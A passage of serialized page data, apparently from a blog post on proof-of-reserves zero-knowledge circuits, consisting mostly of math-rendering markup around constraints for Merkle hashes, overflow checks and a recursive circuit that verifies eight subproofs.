,{"className":101332},[28514],[101334],{"type":30,"value":28517},{"type":24,"tag":301,"props":101336,"children":101338},{"className":101337},[10860],[101339],{"type":24,"tag":301,"props":101340,"children":101342},{"className":101341,"style":99828},[10865],[101343],{"type":24,"tag":301,"props":101344,"children":101345},{},[],{"type":24,"tag":301,"props":101347,"children":101349},{"className":101348},[10946],[101350],{"type":30,"value":10949},{"type":24,"tag":301,"props":101352,"children":101354},{"className":101353,"style":10953},[10914],[],{"type":24,"tag":301,"props":101356,"children":101358},{"className":101357},[10835,28357],[101359],{"type":30,"value":101212},{"type":24,"tag":301,"props":101361,"children":101363},{"className":101362},[10835,28357],[101364],{"type":30,"value":1724},{"type":24,"tag":301,"props":101366,"children":101368},{"className":101367},[10835],[101369,101374],{"type":24,"tag":301,"props":101370,"children":101372},{"className":101371},[10835,28357],[101373],{"type":30,"value":2597},{"type":24,"tag":301,"props":101375,"children":101377},{"className":101376},[10850],[101378],{"type":24,"tag":301,"props":101379,"children":101381},{"className":101380},[10855,28411],[101382,101411],{"type":24,"tag":301,"props":101383,"children":101385},{"className":101384},[10860],[101386,101406],{"type":24,"tag":301,"props":101387,"children":101389},{"className":101388,"style":99797},[10865],[101390],{"type":24,"tag":301,"props":101391,"children":101392},{"style":99801},[101393,101397],{"type":24,"tag":301,"props":101394,"children":101396},{"className":101395,"style":10875},[10874],[],{"type":24,"tag":301,"props":101398,"children":101400},{"className":101399},[10880,10881,10882,10883],[101401],{"type":24,"tag":301,"props":101402,"children":101404},{"className":101403},[10835,10883],[101405],{"type":30,"value":546},{"type":24,"tag":301,"props":101407,"children":101409},{"className":101408},[28514],[101410],{"type":30,"value":28517},{"type":24,"tag":301,"props":101412,"children":101414},{"className":101413},[10860],[101415],{"type":24,"tag":301,"props":101416,"children":101418},{"className":101417,"style":99828},[10865],[101419],{"type":24,"tag":301,"props":101420,"children":101421},{},[],{"type":24,"tag":301,"props":101423,"children":101425},{"className":101424},[10946],[101426],{"type":30,"value":10949},{"type":24,"tag":301,"props":101428,"children":101430},{"className":101429},[10914],[101431],{"type":30,"value":28458},{"type":24,"tag":301,"props":101433,"children":101435},{"className":101434,"style":10953},[10914],[],{"type":24,"tag":301,"props":101437,"children":101439},{"className":101438},[10835],[101440],{"type":30,"value":4054},{"type":24,"tag":301,"props":101442,"children":101444},{"className":101443},[10946],[101445],{"type":30,"value":10949},{"type":24,"tag":301,"props":101447,"children":101449},{"className":101448,"style":10953},[10914],[],{"type":24,"tag":301,"props":101451,"children":101453},{"className":101452},[10835,28357],[101454],{"type":30,"value":101212},{"type":24,"tag":301,"props":101456,"children":101458},{"className":101457},[10835,28357],[101459],{"type":30,"value":1724},{"type":24,"tag":301,"props":101461,"children":101463},{"className":101462},[10835],[101464,101469],{"type":24,"tag":301,"props":101465,"children":101467},{"className":101466},[10835,28357],[101468],{"type":30,"value":2597},{"type":24,"tag":301,"props":101470,"children":101472},{"className":101471},[10850],[101473],{"type":24,"tag":301,"props":101474,"children":101476},{"className":101475},[10855,28411],[101477,101511],{"type":24,"tag":301,"props":101478,"children":101480},{"className":101479},[10860],[101481,101506],{"type":24,"tag":301,"props":101482,"children":101484},{"className":101483,"style":99797},[10865],[101485],{"type":24,"tag":301,"props":101486,"children":101487},{"style":99801},[101488,101492],{"type":24,"tag":301,"props":101489,"children":101491},{"className":101490,"style":10875},[10874],[],{"type":24,"tag":301,"props":101493,"children":101495},{"className":101494},[10880,10881,10882,10883],[101496],{"type":24,"tag":301,"props":101497,"children":101499},{"className":101498},[10835,10883],[101500],{"type":24,"tag":301,"props":101501,"children":101503},{"className":101502},[10835,10883],[101504],{"type":30,"value":101505},"511",{"type":24,"tag":301,"props":101507,"children":101509},{"className":101508},[28514],[101510],{"type":30,"value":28517},{"type":24,"tag":301,"props":101512,"children":101514},{"className":101513},[10860],[101515],{"type":24,"tag":301,"props":101516,"children":101518},{"className":101517,"style":99828},[10865],[101519],{"type":24,"tag":301,"props":101520,"children":101521},{},[],{"type":24,"tag":301,"props":101523,"children":101525},{"className":101524},[28508],[101526],{"type":30,"value":9961},{"type":30,"value":13277},{"type":24,"tag":60,"props":101529,"children":101530},{},[101531],{"type":30,"value":101532},"(merkle tree hash)",{"type":24,"tag":2659,"props":101534,"children":101535},{},[101536,101811,101812,101817,101819,101824],{"type":24,"tag":145,"props":101537,"children":101539},{"className":101538},[10807,10808],[101540],{"type":24,"tag":301,"props":101541,"children":101543},{"className":101542},[10813],[101544],{"type":24,"tag":301,"props":101545,"children":101547},{"className":101546,"ariaHidden":10819},[10818],[101548,101741],{"type":24,"tag":301,"props":101549,"children":101551},{"className":101550},[10824],[101552,101556,101561,101566,101571,101576,101581,101586,101591,101596,101601,101606,101611,101616,101621,101626,101683,101688,101693,101698,101703,101708,101713,101718,101723,101728,101732,101737],{"type":24,"tag":301,"props":101553,"children":101555},{"className":101554,"style":99687},[10829],[],{"type":24,"tag":301,"props":101557,"children":101559},{"className":101558},[10835,28357],[101560],{"type":30,"value":188},{"type":24,"tag":301,"props":101562,"children":101564},{"className":101563},[10835,28357],[101565],{"type":30,"value":100201},{"type":24,"tag":301,"props":101567,"children":101569},{"className":101568},[10835,28357],[101570],{"type":30,"value":100003},{"type":24,"tag":301,"props":101572,"children":101574},{"className":101573},[10835,28357],[101575],{"type":30,"value":63123},{"type":24,"tag":301,"props":101577,"children":101579},{"className":101578},[10835,28357],[101580],{"type":30,"value":28499},{"type":24,"tag":301,"props":101582,"children":101584},{"className":101583,"style":99745},[10835],[101585],{"type":30,"value":9918},{"type":24,"tag":301,"props":101587,"children":101589},{"className":101588},[10835,28357],[101590],{"type":30,"value":188},{"type":24,"tag":301,"props":101592,"children":101594},{"className":101593},[10835,28357],[101595],{"type":30,"value":99736},{"type":24,"tag":301,"props":101597,"children":101599},{"className":101598},[10835,28357],[101600],{"type":30,"value":28499},{"type":24,"tag":301,"props":101602,"children":101604},{"className":101603,"style":99745},[10835],[101605],{"type":30,"value":9918},{"type":24,"tag":301,"props":101607,"children":101609},{"className":101608},[10835,28357],[101610],{"type":30,"value":99753},{"type":24,"tag":301,"props":101612,"children":101614},{"className":101613,"style":99757},[10835,28357],[101615],{"type":30,"value":99760},{"type":24,"tag":301,"props":101617,"children":101619},{"className":101618},[10835,28357],[101620],{"type":30,"value":99766},{"type":24,"tag":301,"props":101622,"children":101624},{"className":101623},[10835,28357],[101625],{"type":30,"value":99772},{"type":24,"tag":301,"props":101627,"children":101629},{"className":101628},[10835],[101630,101635],{"type":24,"tag":301,"props":101631,"children":101633},{"className":101632},[10835,28357],[101634],{"type":30,"value":1724},{"type":24,"tag":301,"props":101636,"children":101638},{"className":101637},[10850],[101639],{"type":24,"tag":301,"props":101640,"children":101642},{"className":101641},[10855,28411],[101643,101672],{"type":24,"tag":301,"props":101644,"children":101646},{"className":101645},[10860],[101647,101667],{"type":24,"tag":301,"props":101648,"children":101650},{"className":101649,"style":100273},[10865],[101651],{"type":24,"tag":301,"props":101652,"children":101653},{"style":99801},[101654,101658],{"type":24,"tag":301,"props":101655,"children":101657},{"className":101656,"style":10875},[10874],[],{"type":24,"tag":301,"props":101659,"children":101661},{"className":101660},[10880,10881,10882,10883],[101662],{"type":24,"tag":301,"props":101663,"children":101665},{"className":101664},[10835,28357,10883],[101666],{"type":30,"value":10564},{"type":24,"tag":301,"props":101668,"children":101670},{"className":101669},[28514],[101671],{"type":30,"value":28517},{"type":24,"tag":301,"props":101673,"children":101675},{"className":101674},[10860],[101676],{"type":24,"tag":301,"props":101677,"children":101679},{"className":101678,"style":99828},[10865],[101680],{"type":24,"tag":301,"props":101681,"children":101682},{},[],{"type":24,"tag":301,"props":101684,"children":101686},{"className":101685},[28486],[101687],{"type":30,"value":541},{"type":24,"tag":301,"props":101689,"children":101691},{"className":101690},[10835,28357],[101692],{"type":30,"value":188},{"type":24,"tag":301,"props":101694,"children":101696},{"className":101695},[10835,28357],[101697],{"type":30,"value":99736},{"type":24,"tag":301,"props":101699,"children":101701},{"className":101700},[10835,28357],[101702],{"type":30,"value":28499},{"type":24,"tag":301,"props":101704,"children":101706},{"className":101705,"style":99745},[10835],[101707],{"type":30,"value":9918},{"type":24,"tag":301,"props":101709,"children":101711},{"className":101710},[10835,28357],[101712],{"type":30,"value":63123},{"type":24,"tag":301,"props":101714,"children":101716},{"className":101715},[10835,28357],[101717],{"type":30,"value":100003},{"type":24,"tag":301,"props":101719,"children":101721},{"className":101720},[10835,28357],[101722],{"type":30,"value":57861},{"type":24,"tag":301,"props":101724,"children":101726},{"className":101725},[28508],[101727],{"type":30,"value":22200},{"type":24,"tag":301,"props":101729,"children":101731},{"className":101730,"style":11012},[10914],[],{"type":24,"tag":301,"props":101733,"children":101735},{"className":101734},[11017],[101736],{"type":30,"value":1849},{"type":24,"tag":301,"props":101738,"children":101740},{"className":101739,"style":11012},[10914],[],{"type":24,"tag":301,"props":101742,"children":101744},{"className":101743},[10824],[101745,101749,101756,101761,101767,101772,101777,101782,101788,101793,101799,101805],{"type":24,"tag":301,"props":101746,"children":101748},{"className":101747,"style":99687},[10829],[],{"type":24,"tag":301,"props":101750,"children":101753},{"className":101751,"style":101752},[10835,28357],"margin-right:0.10903em;",[101754],{"type":30,"value":101755},"M",{"type":24,"tag":301,"props":101757,"children":101759},{"className":101758},[10835,28357],[101760],{"type":30,"value":83479},{"type":24,"tag":301,"props":101762,"children":101765},{"className":101763,"style":101764},[10835,28357],"margin-right:0.07847em;",[101766],{"type":30,"value":12952},{"type":24,"tag":301,"props":101768,"children":101770},{"className":101769,"style":99745},[10835],[101771],{"type":30,"value":9918},{"type":24,"tag":301,"props":101773,"children":101775},{"className":101774,"style":28816},[10835,28357],[101776],{"type":30,"value":28819},{"type":24,"tag":301,"props":101778,"children":101780},{"className":101779},[10835,28357],[101781],{"type":30,"value":83479},{"type":24,"tag":301,"props":101783,"children":101785},{"className":101784,"style":28816},[10835,28357],[101786],{"type":30,"value":101787},"FE",{"type":24,"tag":301,"props":101789,"children":101791},{"className":101790,"style":99745},[10835],[101792],{"type":30,"value":9918},{"type":24,"tag":301,"props":101794,"children":101796},{"className":101795,"style":101764},[10835,28357],[101797],{"type":30,"value":101798},"I",{"type":24,"tag":301,"props":101800,"children":101802},{"className":101801,"style":28358},[10835,28357],[101803],{"type":30,"value":101804},"NT",{"type":24,"tag":301,"props":101806,"children":101808},{"className":101807},[10835],[101809],{"type":30,"value":101810},"/512",{"type":30,"value":13277},{"type":24,"tag":60,"props":101813,"children":101814},{},[101815],{"type":30,"value":101816},"(overflow check)",{"type":30,"value":101818}," --> overflow check is made this way for performance (note that 512 is actually the ",{"type":24,"tag":145,"props":101820,"children":101822},{"className":101821},[],[101823],{"type":30,"value":99603},{"type":30,"value":9961},{"type":24,"tag":32,"props":101826,"children":101827},{},[101828],{"type":30,"value":101829},"Here is a visual scheme of the inputs of the batch circuit + how user hashes are generated:",{"type":24,"tag":32,"props":101831,"children":101832},{},[101833],{"type":24,"tag":177,"props":101834,"children":101836},{"alt":179,"src":101835},"/posts/por/batch-circuit-inputs.png",[],{"type":24,"tag":80,"props":101838,"children":101840},{"id":101839},"recursive-circuit",[101841],{"type":30,"value":101842},"Recursive Circuit",{"type":24,"tag":32,"props":101844,"children":101845},{},[101846],{"type":30,"value":101847},"Recursive circuits get eight subproofs as input, verify if all the asset prices are the same, and calculate the summed balances and Merkle hash. Here are the constraints.",{"type":24,"tag":32,"props":101849,"children":101850},{},[101851],{"type":24,"tag":60,"props":101852,"children":101853},{},[101854],{"type":30,"value":100116},{"type":24,"tag":2655,"props":101856,"children":101857},{},[101858,101862,101867],{"type":24,"tag":2659,"props":101859,"children":101860},{},[101861],{"type":30,"value":100134},{"type":24,"tag":2659,"props":101863,"children":101864},{},[101865],{"type":30,"value":101866},"Asset prices",{"type":24,"tag":2659,"props":101868,"children":101869},{},[101870],{"type":30,"value":100129},{"type":24,"tag":32,"props":101872,"children":101873},{},[101874],{"type":24,"tag":60,"props":101875,"children":101876},{},[101877],{"type":30,"value":100142},{"type":24,"tag":2655,"props":101879,"children":101880},{},[101881],{"type":24,"tag":2659,"props":101882,"children":101883},{},[101884],{"type":30,"value":101885},"8 subproofs",{"type":24,"tag":32,"props":101887,"children":101888},{},[101889],{"type":24,"tag":60,"props":101890,"children":101891},{},[101892],{"type":30,"value":100163},{"type":24,"tag":2655,"props":101894,"children":101895},{},[101896,102306,102637,103004,103391],{"type":24,"tag":2659,"props":101897,"children":101898},{},[101899,102301,102302],{"type":24,"tag":145,"props":101900,"children":101902},{"className":101901},[10807,10808],[101903],{"type":24,"tag":301,"props":101904,"children":101906},{"className":101905},[10813],[101907],{"type":24,"tag":301,"props":101908,"children":101910},{"className":101909,"ariaHidden":10819},[10818],[101911,102047],{"type":24,"tag":301,"props":101912,"children":101914},{"className":101913},[10824],[101915,101919,101924,101929,101934,101939,101944,101949,101954,101959,101964,101969,101974,101979,101984,101989,101994,101999,102004,102009,102014,102019,102024,102029,102034,102038,102043],{"type":24,"tag":301,"props":101916,"children":101918},{"className":101917,"style":99687},[10829],[],{"type":24,"tag":301,"props":101920,"children":101922},{"className":101921},[10835,28357],[101923],{"type":30,"value":28499},{"type":24,"tag":301,"props":101925,"children":101927},{"className":101926},[10835,28357],[101928],{"type":30,"value":99715},{"type":24,"tag":301,"props":101930,"children":101932},{"className":101931},[10835,28357],[101933],{"type":30,"value":28499},{"type":24,"tag":301,"props":101935,"children":101937},{"className":101936},[10835,28357],[101938],{"type":30,"value":188},{"type":24,"tag":301,"props":101940,"children":101942},{"className":101941,"style":99757},[10835,28357],[101943],{"type":30,"value":99760},{"type":24,"tag":301,"props":101945,"children":101947},{"className":101946,"style":99745},[10835],[101948],{"type":30,"value":9918},{"type":24,"tag":301,"props":101950,"children":101952},{"className":101951},[10835,28357],[101953],{"type":30,"value":188},{"type":24,"tag":301,"props":101955,"children":101957},{"className":101956},[10835,28357],[101958],{"type":30,"value":99736},{"type":24,"tag":301,"props":101960,"children":101962},{"className":101961},[10835,28357],[101963],{"type":30,"value":28499},{"type":24,"tag":301,"props":101965,"children":101967},{"className":101966,"style":99745},[10835],[101968],{"type":30,"value":9918},{"type":24,"tag":301,"props":101970,"children":101972},{"className":101971},[10835,28357],[101973],{"type":30,"value":99753},{"type":24,"tag":301,"props":101975,"children":101977},{"className":101976,"style":99757},[10835,28357],[101978],{"type":30,"value":99760},{"type":24,"tag":301,"props":101980,"children":101982},{"className":101981},[10835,28357],[101983],{"type":30,"value":99766},{"type":24,"tag":301,"props":101985,"children":101987},{"className":101986},[10835,28357],[101988],{"type":30,"value":99772},{"type":24,"tag":301,"props":101990,"children":101992},{"className":101991},[28486],[101993],{"type":30,"value":541},{"type":24,"tag":301,"props":101995,"children":101997},{"className":101996},[10835,28357],[101998],{"type":30,"value":188},{"type":24,"tag":301,"props":102000,"children":102002},{"className":102001},[10835,28357],[102003],{"type":30,"value":99736},{"type":24,"tag":301,"props":102005,"children":102007},{"className":102006},[10835,28357],[102008],{"type":30,"value":28499},{"type":24,"tag":301,"props":102010,"children":102012},{"className":102011,"style":99745},[10835],[102013],{"type":30,"value":9918},{"type":24,"tag":301,"props":102015,"children":102017},{"className":102016},[10835,28357],[102018],{"type":30,"value":63123},{"type":24,"tag":301,"props":102020,"children":102022},{"className":102021},[10835,28357],[102023],{"type":30,"value":100003},{"type":24,"tag":301,"props":102025,"children":102027},{"className":102026},[10835,28357],[102028],{"type":30,"value":57861},{"type":24,"tag":301,"props":102030,"children":102032},{"className":102031},[28508],[102033],{"type":30,"value":22200},{"type":24,"tag":301,"props":102035,"children":102037},{"className":102036,"style":11012},[10914],[],{"type":24,"tag":301,"props":102039,"children":102041},{"className":102040},[11017],[102042],{"type":30,"value":607},{"type":24,"tag":301,"props":102044,"children":102046},{"className":102045,"style":11012},[10914],[],{"type":24,"tag":301,"props":102048,"children":102050},{"className":102049},[10824],[102051,102055,102060,102065,102070,102075,102080,102085,102091,102150,102155,102160,102165,102170,102175,102180,102185,102190,102196,102201,102206,102211,102216,102221,102226,102231,102236,102241,102246,102251,102256,102261,102266,102271,102276,102281,102286,102291,102296],{"type":24,"tag":301,"props":102052,"children":102054},{"className":102053,"style":99687},[10829],[],{"type":24,"tag":301,"props":102056,"children":102058},{"className":102057},[10835],[102059],{"type":30,"value":100334},{"type":24,"tag":301,"props":102061,"children":102063},{"className":102062},[10914],[102064],{"type":30,"value":28458},{"type":24,"tag":301,"props":102066,"children":102068},{"className":102067},[10835,28357],[102069],{"type":30,"value":1724},{"type":24,"tag":301,"props":102071,"children":102073},{"className":102072},[10835,28357],[102074],{"type":30,"value":100003},{"type":24,"tag":301,"props":102076,"children":102078},{"className":102077},[10835,28357],[102079],{"type":30,"value":5613},{"type":24,"tag":301,"props":102081,"children":102083},{"className":102082},[10835,28357],[102084],{"type":30,"value":32},{"type":24,"tag":301,"props":102086,"children":102088},{"className":102087},[10835,28357],[102089],{"type":30,"value":102090},"roo",{"type":24,"tag":301,"props":102092,"children":102094},{"className":102093},[10835],[102095,102101],{"type":24,"tag":301,"props":102096,"children":102099},{"className":102097,"style":102098},[10835,28357],"margin-right:0.10764em;",[102100],{"type":30,"value":39835},{"type":24,"tag":301,"props":102102,"children":102104},{"className":102103},[10850],[102105],{"type":24,"tag":301,"props":102106,"children":102108},{"className":102107},[10855,28411],[102109,102139],{"type":24,"tag":301,"props":102110,"children":102112},{"className":102111},[10860],[102113,102134],{"type":24,"tag":301,"props":102114,"children":102116},{"className":102115,"style":100273},[10865],[102117],{"type":24,"tag":301,"props":102118,"children":102120},{"style":102119},"top:-2.55em;margin-left:-0.1076em;margin-right:0.05em;",[102121,102125],{"type":24,"tag":301,"props":102122,"children":102124},{"className":102123,"style":10875},[10874],[],{"type":24,"tag":301,"props":102126,"children":102128},{"className":102127},[10880,10881,10882,10883],[102129],{"type":24,"tag":301,"props":102130,"children":102132},{"className":102131},[10835,28357,10883],[102133],{"type":30,"value":10564},{"type":24,"tag":301,"props":102135,"children":102137},{"className":102136},[28514],[102138],{"type":30,"value":28517},{"type":24,"tag":301,"props":102140,"children":102142},{"className":102141},[10860],[102143],{"type":24,"tag":301,"props":102144,"children":102146},{"className":102145,"style":99828},[10865],[102147],{"type":24,"tag":301,"props":102148,"children":102149},{},[],{"type":24,"tag":301,"props":102151,"children":102153},{"className":102152},[10835],[102154],{"type":30,"value":206},{"type":24,"tag":301,"props":102156,"children":102158},{"className":102157},[10835,28357],[102159],{"type":30,"value":32},{"type":24,"tag":301,"props":102161,"children":102163},{"className":102162},[10835,28357],[102164],{"type":30,"value":100003},{"type":24,"tag":301,"props":102166,"children":102168},{"className":102167},[10835,28357],[102169],{"type":30,"value":5613},{"type":24,"tag":301,"props":102171,"children":102173},{"className":102172,"style":99757},[10835,28357],[102174],{"type":30,"value":99760},{"type":24,"tag":301,"props":102176,"children":102178},{"className":102177},[10835,28357],[102179],{"type":30,"value":10564},{"type":24,"tag":301,"props":102181,"children":102183},{"className":102182},[10835,28357],[102184],{"type":30,"value":294},{"type":24,"tag":301,"props":102186,"children":102188},{"className":102187,"style":99745},[10835],[102189],{"type":30,"value":9918},{"type":24,"tag":301,"props":102191,"children":102193},{"className":102192},[10835,28357],[102194],{"type":30,"value":102195},"in",{"type":24,"tag":301,"props":102197,"children":102199},{"className":102198},[10835,28357],[102200],{"type":30,"value":32},{"type":24,"tag":301,"props":102202,"children":102204},{"className":102203},[10835,28357],[102205],{"type":30,"value":100003},{"type":24,"tag":301,"props":102207,"children":102209},{"className":102208},[10835,28357],[102210],{"type":30,"value":28499},{"type":24,"tag":301,"props":102212,"children":102214},{"className":102213},[10835],[102215],{"type":30,"value":206},{"type":24,"tag":301,"props":102217,"children":102219},{"className":102218},[10835,28357],[102220],{"type":30,"value":188},{"type":24,"tag":301,"props":102222,"children":102224},{"className":102223},[10835,28357],[102225],{"type":30,"value":99736},{"type":24,"tag":301,"props":102227,"children":102229},{"className":102228},[10835,28357],[102230],{"type":30,"value":28499},{"type":24,"tag":301,"props":102232,"children":102234},{"className":102233,"style":99745},[10835],[102235],{"type":30,"value":9918},{"type":24,"tag":301,"props":102237,"children":102239},{"className":102238},[10835,28357],[102240],{"type":30,"value":99753},{"type":24,"tag":301,"props":102242,"children":102244},{"className":102243,"style":99757},[10835,28357],[102245],{"type":30,"value":99760},{"type":24,"tag":301,"props":102247,"children":102249},{"className":102248},[10835,28357],[102250],{"type":30,"value":99766},{"type":24,"tag":301,"props":102252,"children":102254},{"className":102253},[10835,28357],[102255],{"type":30,"value":100574},{"type":24,"tag":301,"props":102257,"children":102259},{"className":102258},[28486],[102260],{"type":30,"value":541},{"type":24,"tag":301,"props":102262,"children":102264},{"className":102263},[10835,28357],[102265],{"type":30,"value":188},{"type":24,"tag":301,"props":102267,"children":102269},{"className":102268},[10835,28357],[102270],{"type":30,"value":99736},{"type":24,"tag":301,"props":102272,"children":102274},{"className":102273},[10835,28357],[102275],{"type":30,"value":28499},{"type":24,"tag":301,"props":102277,"children":102279},{"className":102278,"style":99745},[10835],[102280],{"type":30,"value":9918},{"type":24,"tag":301,"props":102282,"children":102284},{"className":102283},[10835,28357],[102285],{"type":30,"value":63123},{"type":24,"tag":301,"props":102287,"children":102289},{"className":102288},[10835,28357],[102290],{"type":30,"value":100003},{"type":24,"tag":301,"props":102292,"children":102294},{"className":102293},[10835,28357],[102295],{"type":30,"value":57861},{"type":24,"tag":301,"props":102297,"children":102299},{"className":102298},[28508],[102300],{"type":30,"value":22200},{"type":30,"value":13277},{"type":24,"tag":60,"props":102303,"children":102304},{},[102305],{"type":30,"value":101134},{"type":24,"tag":2659,"props":102307,"children":102308},{},[102309],{"type":24,"tag":145,"props":102310,"children":102312},{"className":102311},[10807,10808],[102313],{"type":24,"tag":301,"props":102314,"children":102316},{"className":102315},[10813],[102317],{"type":24,"tag":301,"props":102318,"children":102320},{"className":102319,"ariaHidden":10819},[10818],[102321,102427],{"type":24,"tag":301,"props":102322,"children":102324},{"className":102323},[10824],[102325,102329,102334,102339,102344,102349,102354,102359,102364,102369,102374,102379,102384,102389,102394,102399,102404,102409,102414,102418,102423],{"type":24,"tag":301,"props":102326,"children":102328},{"className":102327,"style":99687},[10829],[],{"type":24,"tag":301,"props":102330,"children":102332},{"className":102331},[10835,28357],[102333],{"type":30,"value":188},{"type":24,"tag":301,"props":102335,"children":102337},{"className":102336},[10835,28357],[102338],{"type":30,"value":99736},{"type":24,"tag":301,"props":102340,"children":102342},{"className":102341},[10835,28357],[102343],{"type":30,"value":28499},{"type":24,"tag":301,"props":102345,"children":102347},{"className":102346,"style":99745},[10835],[102348],{"type":30,"value":9918},{"type":24,"tag":301,"props":102350,"children":102352},{"className":102351},[10835,28357],[102353],{"type":30,"value":32},{"type":24,"tag":301,"props":102355,"children":102357},{"className":102356,"style":99745},[10835,28357],[102358],{"type":30,"value":100563},{"type":24,"tag":301,"props":102360,"children":102362},{"className":102361},[10835,28357],[102363],{"type":30,"value":10564},{"type":24,"tag":301,"props":102365,"children":102367},{"className":102366},[10835,28357],[102368],{"type":30,"value":99772},{"type":24,"tag":301,"props":102370,"children":102372},{"className":102371},[28486],[102373],{"type":30,"value":541},{"type":24,"tag":301,"props":102375,"children":102377},{"className":102376},[10835,28357],[102378],{"type":30,"value":188},{"type":24,"tag":301,"props":102380,"children":102382},{"className":102381},[10835,28357],[102383],{"type":30,"value":99736},{"type":24,"tag":301,"props":102385,"children":102387},{"className":102386},[10835,28357],[102388],{"type":30,"value":28499},{"type":24,"tag":301,"props":102390,"children":102392},{"className":102391,"style":99745},[10835],[102393],{"type":30,"value":9918},{"type":24,"tag":301,"props":102395,"children":102397},{"className":102396},[10835,28357],[102398],{"type":30,"value":63123},{"type":24,"tag":301,"props":102400,"children":102402},{"className":102401},[10835,28357],[102403],{"type":30,"value":100003},{"type":24,"tag":301,"props":102405,"children":102407},{"className":102406},[10835,28357],[102408],{"type":30,"value":57861},{"type":24,"tag":301,"props":102410,"children":102412},{"className":102411},[28508],[102413],{"type":30,"value":22200},{"type":24,"tag":301,"props":102415,"children":102417},{"className":102416,"style":11012},[10914],[],{"type":24,"tag":301,"props":102419,"children":102421},{"className":102420},[11017],[102422],{"type":30,"value":607},{"type":24,"tag":301,"props":102424,"children":102426},{"className":102425,"style":11012},[10914],[],{"type":24,"tag":301,"props":102428,"children":102430},{"className":102429},[10824],[102431,102435,102440,102445,102450,102455,102460,102517,102522,102527,102532,102537,102542,102547,102552,102557,102562,102567,102572,102577,102582,102587,102592,102597,102602,102607,102612,102617,102622,102627,102632],{"type":24,"tag":301,"props":102432,"children":102434},{"className":102433,"style":99687},[10829],[],{"type":24,"tag":301,"props":102436,"children":102438},{"className":102437},[10835,28357],[102439],{"type":30,"value":1724},{"type":24,"tag":301,"props":102441,"children":102443},{"className":102442},[10835,28357],[102444],{"type":30,"value":100003},{"type":24,"tag":301,"props":102446,"children":102448},{"className":102447},[10835,28357],[102449],{"type":30,"value":5613},{"type":24,"tag":301,"props":102451,"children":102453},{"className":102452},[10835,28357],[102454],{"type":30,"value":32},{"type":24,"tag":301,"props":102456,"children":102458},{"className":102457},[10835,28357],[102459],{"type":30,"value":102090},{"type":24,"tag":301,"props":102461,"children":102463},{"className":102462},[10835],[102464,102469],{"type":24,"tag":301,"props":102465,"children":102467},{"className":102466,"style":102098},[10835,28357],[102468],{"type":30,"value":39835},{"type":24,"tag":301,"props":102470,"children":102472},{"className":102471},[10850],[102473],{"type":24,"tag":301,"props":102474,"children":102476},{"className":102475},[10855,28411],[102477,102506],{"type":24,"tag":301,"props":102478,"children":102480},{"className":102479},[10860],[102481,102501],{"type":24,"tag":301,"props":102482,"children":102484},{"className":102483,"style":100273},[10865],[102485],{"type":24,"tag":301,"props":102486,"children":102487},{"style":102119},[102488,102492],{"type":24,"tag":301,"props":102489,"children":102491},{"className":102490,"style":10875},[10874],[],{"type":24,"tag":301,"props":102493,"children":102495},{"className":102494},[10880,10881,10882,10883],[102496],{"type":24,"tag":301,"props":102497,"children":102499},{"className":102498},[10835,28357,10883],[102500],{"type":30,"value":10564},{"type":24,"tag":301,"props":102502,"children":102504},{"className":102503},[28514],[102505],{"type":30,"value":28517},{"type":24,"tag":301,"props":102507,"children":102509},{"className":102508},[10860],[102510],{"type":24,"tag":301,"props":102511,"children":102513},{"className":102512,"style":99828},[10865],[102514],{"type":24,"tag":301,"props":102515,"children":102516},{},[],{"type":24,"tag":301,"props":102518,"children":102520},{"className":102519},[10835],[102521],{"type":30,"value":206},{"type":24,"tag":301,"props":102523,"children":102525},{"className":102524},[10835,28357],[102526],{"type":30,"value":32},{"type":24,"tag":301,"props":102528,"children":102530},{"className":102529},[10835,28357],[102531],{"type":30,"value":100003},{"type":24,"tag":301,"props":102533,"children":102535},{"className":102534},[10835,28357],[102536],{"type":30,"value":5613},{"type":24,"tag":301,"props":102538,"children":102540},{"className":102539,"style":99757},[10835,28357],[102541],{"type":30,"value":99760},{"type":24,"tag":301,"props":102543,"children":102545},{"className":102544},[10835,28357],[102546],{"type":30,"value":10564},{"type":24,"tag":301,"props":102548,"children":102550},{"className":102549},[10835,28357],[102551],{"type":30,"value":294},{"type":24,"tag":301,"props":102553,"children":102555},{"className":102554,"style":99745},[10835],[102556],{"type":30,"value":9918},{"type":24,"tag":301,"props":102558,"children":102560},{"className":102559},[10835,28357],[102561],{"type":30,"value":102195},{"type":24,"tag":301,"props":102563,"children":102565},{"className":102564},[10835,28357],[102566],{"type":30,"value":32},{"type":24,"tag":301,"props":102568,"children":102570},{"className":102569},[10835,28357],[102571],{"type":30,"value":100003},{"type":24,"tag":301,"props":102573,"children":102575},{"className":102574},[10835,28357],[102576],{"type":30,"value":28499},{"type":24,"tag":301,"props":102578,"children":102580},{"className":102579},[10835],[102581],{"type":30,"value":206},{"type":24,"tag":301,"props":102583,"children":102585},{"className":102584},[10835,28357],[102586],{"type":30,"value":188},{"type":24,"tag":301,"props":102588,"children":102590},{"className":102589},[10835,28357],[102591],{"type":30,"value":99736},{"type":24,"tag":301,"props":102593,"children":102595},{"className":102594},[10835,28357],[102596],{"type":30,"value":28499},{"type":24,"tag":301,"props":102598,"children":102600},{"className":102599,"style":99745},[10835],[102601],{"type":30,"value":9918},{"type":24,"tag":301,"props":102603,"children":102605},{"className":102604},[10835,28357],[102606],{"type":30,"value":32},{"type":24,"tag":301,"props":102608,"children":102610},{"className":102609,"style":99745},[10835,28357],[102611],{"type":30,"value":100563},{"type":24,"tag":301,"props":102613,"children":102615},{"className":102614},[10835,28357],[102616],{"type":30,"value":10564},{"type":24,"tag":301,"props":102618,"children":102620},{"className":102619},[10835,28357],[102621],{"type":30,"value":100574},{"type":24,"tag":301,"props":102623,"children":102625},{"className":102624},[28486],[102626],{"type":30,"value":541},{"type":24,"tag":301,"props":102628,"children":102630},{"className":102629},[10835],[102631],{"type":30,"value":584},{"type":24,"tag":301,"props":102633,"children":102635},{"className":102634},[28508],[102636],{"type":30,"value":22200},{"type":24,"tag":2659,"props":102638,"children":102639},{},[102640,102998,102999],{"type":24,"tag":145,"props":102641,"children":102643},{"className":102642},[10807,10808],[102644],{"type":24,"tag":301,"props":102645,"children":102647},{"className":102646},[10813],[102648],{"type":24,"tag":301,"props":102649,"children":102651},{"className":102650,"ariaHidden":10819},[10818],[102652,102758],{"type":24,"tag":301,"props":102653,"children":102655},{"className":102654},[10824],[102656,102660,102665,102670,102675,102680,102685,102690,102695,102700,102705,102710,102715,102720,102725,102730,102735,102740,102745,102749,102754],{"type":24,"tag":301,"props":102657,"children":102659},{"className":102658,"style":99687},[10829],[],{"type":24,"tag":301,"props":102661,"children":102663},{"className":102662},[10835,28357],[102664],{"type":30,"value":188},{"type":24,"tag":301,"props":10266